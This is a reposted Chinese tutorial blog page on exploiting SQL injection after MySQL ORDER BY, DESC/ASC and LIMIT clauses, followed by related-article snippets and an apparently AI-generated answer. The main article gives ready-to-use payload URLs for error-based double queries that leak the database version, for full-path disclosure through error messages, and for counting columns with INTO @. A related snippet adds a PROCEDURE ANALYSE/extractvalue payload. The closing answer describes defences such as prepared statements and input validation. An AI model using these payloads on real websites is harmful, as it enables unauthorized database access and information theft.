order by/limit 注入

最新推荐文章于 2024-02-24 21:04:52 发布
转载 最新推荐文章于 2024-02-24 21:04:52 发布 · 2k 阅读 · 0
文章标签:

#order by #limit #sql注入

本文介绍在特定条件下如何利用SQL注入漏洞,包括在ORDER BY、DESC/ASC及LIMIT后的参数进行攻击的方法,通过实例展示了如何获取数据库版本、路径及字段数量等关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

类似的代码
php code
SELET * FROM page WHERE id=1 ORDER BY id [参数] ASC [参数] LIMIT 10,10 [参数]
[参数] – 为存在注入的参数
我们不能在这注入上使用union,所以我们只能使用其他我们可以利用的
 
在order by id [参数] 之后使用双重查询
 
假设有以下网站
code:
http://www.domain.com/include/products.php?sb=id–这是id是在order by [id]的一个注入点
 
我知道我可以利用union在另外一个注入点,我要做这样的测试
在order by之后,我们唯一不能使用——unoin,having,where,and还有一些无关紧要的关键字
我们可以使用and进行双重查询
Code:
 
http://www.domain.com/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--'5.0.95-community'
(我用’products’这个表,因为我可以从这个表中看到存在的错误,如果你看不到表,可以使用’information_schema.columns’)
 
在desc/asc [参数] 之后使用双重查询
 
假设有以下网站
code:
http://www.domain.com/include/products.php?sb=id–这是id是在desc [id]的一个注入点
在desc/asc之后它的小问题,因为我们不可以使用——union,having,where,and,or,xor,*,>,所以我们不能执行查询命令
所以我们只要加上一个’,'就可以和语句进行查询了
Code:
 
http://www.domain.com/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))'5.0.95-community'
假设注入如下
PHP Code:
SELECT * FROM page WHERE id=1 ORDER BY [参数] id
添加’1′就可以和最初一样注入了
Code:
1 and (select count(*) from products group by concat(version(),0×27202020,floor(rand(0)*2-1)))–
在limit 10,10 [参数]之后
使用一些技巧
 
假设有以下网址
Code:
 
http://www.2cto.com /include/products.php?rw=10
–注入点在是limit 10这样的形式
当注入点在limit之后,我们什么都做不了,只有以下这些命令
 
offset,into,into outfile/dumpfile,/*!*/,for update,lock in share mode
所以我们想试试我们能利用的
如下:
获取版本
爆出路径
获取字段总数
 
获取版本
我们可以利用评论去获取mysql的版本
我们可以手工去猜它,如果它返回正确,那么页面将不会载入,就像盲注一样,但是有区别
Code:
http://www.domain.com/include/products.php?rw=10 /*!50094aaaa*/页面没有载入说明版本大于5.00.94
Code:
http://www.domain.com/include/products.php?rw=10 /*!50096aaaa*/页面没有载入说明版本小雨5.00.96
Code:
http://www.domain.com/include/products.php?rw=10 /*!50095aaaa*/页面没有载入说明版本等于5.00.95
 
爆出完整路径,我们可以用0或/**/这样的like格式,就可以爆出完整的路径,即便是mysql上报错也可以
Code:
 
http://www.domain.com/include/products.php?rw=0–这是完整的命令
 
PHP Code:
select * from….limit 0,0
 
我们也可以这样
Code:
 
http://www.domain.com/include/products.php?rw=/**/1
提示报错
 
Division by zero in /home/teletec/public_html/include/products.php on line 164
获取字段总数
使用into
它不会真正帮助到我们,但是它是一个不错的技巧
假设我们有以下的网站
Code:
 
http://www.domain.com/include/products.php?rw=10--注射点在like的参数里
我们可以这样获取到字段总数
Code:
 
http://www.domain.com/include/products.php?rw=10 into @
提示报错
error 1222.
not 1 column.
继续递增@
Code:
 
http://www.domain.com/include/products.php?rw=10 into @,@
……
……
http://www.domain.com/include/products.php?rw=10 into @,@,[n..]
一直到返回以下这样的错误
 
error 1172 "Result consisted of more than one row"
则可以确定有多少个字段
 
希望大家在这些技巧里能学到东西。
【漏洞挖掘】——122、Order By注入介绍
Fly_鹏程万里
06-28 235
Order by注入是指存在注入的可控制参数位置位于order by子句后,例如: 注入思考 这里以Less-46为例对order by注入做研究分析直接访问Less-46后提示需要传递数字型的sort参数:随后构造/?sort=1进行访问,给出一张排序的表格 在这里我们首先需要猜测一下数据库后台的SQL语句格式,将1改换为2之后再次请求发现数据没变,数据的排序发生了变化: 由此说明此处应该是根据sort的值来进行排序的,而在SQL语句中只有order by x才会根据x进行排序,说明此处的输
【漏洞挖掘】——127、 Limit注入刨析
Fly_鹏程万里
07-03 378
此方法适用于MySQL 5.x中,在limit语句后面的注入,常见的后台SQL语句如下所示:上面语句包含了ORDER BY,MySQL中UNION语句不能在ORDER BY的后面,不然这里利用UNION就可以很容易的读取数据了,下面看看在MySQL 5中的SELECT语法:从上面可以看到在LIMIT后面可以跟一个函数——PROCEDURE,那么使用PROCEDURE函数能否注入呢?
Limit SQL注入
SheXinK’s Blog
12-18 933
Limit SQL注入1、 SQL注入介绍2、 Limit注入PHP代码3、 Limit注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 Limit注入PHP代码   新建PHP文件,将下面代码复制到P...
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
weixin_34115824的博客
07-27 243
SQL语句类似下面这样:(此方法仅适用于5.0.0<mysql<5.6.6的版本) SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT注入点) 问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order b...
mysql注入limit 注入
Sp4rkW的博客
03-05 4756
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
order bylimit注入
newlife1441的博客
08-08 606
在学习sql注入的过程中我们不可避免要了解许多sql注入的相关注入语句,下面将介绍其中的两种注入方法order bylimit📔注入点出现在oder by后面即可称为order by 注入注入点出现在limit后面即可称为limit注入。...
Sql注入limit注入的学习
Berry2014的博客
05-07 391
0x01 前言 今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入 0x02 知识介绍 limit LIMIT[位置偏移量,]行数 其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。 效果如...
SQL注入order bylimit与宽字节注入
Miracle_ze的博客
08-09 1190
定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。.........
order by注入
weixin_49472648的博客
08-11 730
当页面出现mysql报错信息时,注入点在order by后面,此时可以利用报错信息进行注入。即可控的位置在order by 子句后面。如下图所示,这是正常的order by语句。le |le |
SQL-Labs46关order by注入姿势
热门推荐
钟言的博客
02-24 1万+
本关为SQL-Labs的第46关,order by注入,本篇以多种方法可以通关,详细内容包含了四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 7、盲注脚本等内容
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2076
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
limit注入
左手诗人 右手剑客
07-07 227
page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23
mysql limit后的注入
ztaos的博客
12-04 679
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
小结--limit注入
weixin_30621959的博客
05-24 375
0x01总结一下 这种类型一般实际情况中在参数为start返回一些结果变量的时候,或者其他一些情况,在ctf中也比较多 没有order by 可以跟union select 进行查询 mysql> select user from users limit 0,1 union select user from users; +-------+ | user | +-------+ | adm...
【web渗透】MysqlLimit注入方法
程序员石磊
05-23 1001
原文: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ http://zone.wooyun.org/content/18220 此方法适用于MySQL 5.x中,在limit语句后面的注入 例如: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT inje...
Oracle-order by
洪晓鸿
03-19 575
Oracle-order bycodeprintscreen code -- in 的作用 如果元素在我们的集合中(不在乎是否重复),只要在就满足条件 -- between and 某元素包含在某个区间,是包括相等的情况的 alter table t_user add birthday date select * from t_user update t_user set birthday=cur...
SQL注入order by注入limit注入
m0_46467017的博客
08-09 5849
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
mysql limit 注入_[转载]MysqlLimit注入方法
weixin_39517797的博客
01-19 211
此方法适用于MySQL 5.x中,在limit语句后面的注入例如:1SELECTfieldFROMtableWHEREid > 0ORDERBYid LIMIT injection_point上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法:01SELEC...
order by sql注入
最新发布
02-05
### SQL注入中 `ORDER BY` 的攻击方式 在SQL注入场景下,`ORDER BY` 子句可以被利用来探测列的数量以及验证是否存在SQL注入漏洞。通过向应用程序发送带有不同数值的 `ORDER BY` 请求,攻击者能够观察返回的结果集变化情况,以此推断出数据库表结构。 例如,在一个存在漏洞的应用程序参数处插入如下payload: ```sql ?id=1 ORDER BY 5 -- ``` 如果上述请求成功执行并返回正常结果,则说明该表至少有五列;反之则表明尝试越界访问失败[^2]。 ### 防御措施 为了防止基于 `ORDER BY` 的SQL注入攻击,建议采取以下几种策略: #### 使用预编译语句 (Prepared Statements) 采用预编译语句是防范SQL注入最有效的方式之一。这种方式使得SQL代码和数据分离处理,即使用户输入恶意内容也不会影响原始查询逻辑。具体实现上可以通过设置占位符来代替动态部分,并由驱动程序负责安全传递实际值给数据库引擎解析。 示例代码(Python + MySQL Connector): ```python import mysql.connector conn = mysql.connector.connect(user='root', password='', host='localhost') cursor = conn.cursor(prepared=True) query = "SELECT * FROM users WHERE id=%s ORDER BY %s LIMIT 1" data_tuple = ('some_id_value', 'column_name') cursor.execute(query, data_tuple) result_set = cursor.fetchall() for row in result_set: print(row) ``` 此做法不仅提高了安全性还增强了性能表现[^1]。 #### 输入校验与清理 严格控制外部输入的内容形式,确保其符合预期模式后再参与构建最终要被执行的SQL指令。比如针对整数类型的字段只允许纯数字串进入后续流程;而对于字符串类别的变量则需去除潜在危险字符如分号(`;`)、单引号(')等特殊符号。 此外还可以考虑引入白名单机制限定可接受范围内的合法选项作为排序依据,减少因误操作引发的风险。 #### 错误信息最小化原则 当遇到异常状况时应尽量避免暴露过多内部细节给前端展示出来,转而提供统一友好的提示文案告知用户发生了什么问题而不透露任何有关底层架构的具体线索。这有助于阻止那些试图从报错消息里寻找突破口实施进一步侵害行为的人士获得有用情报[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值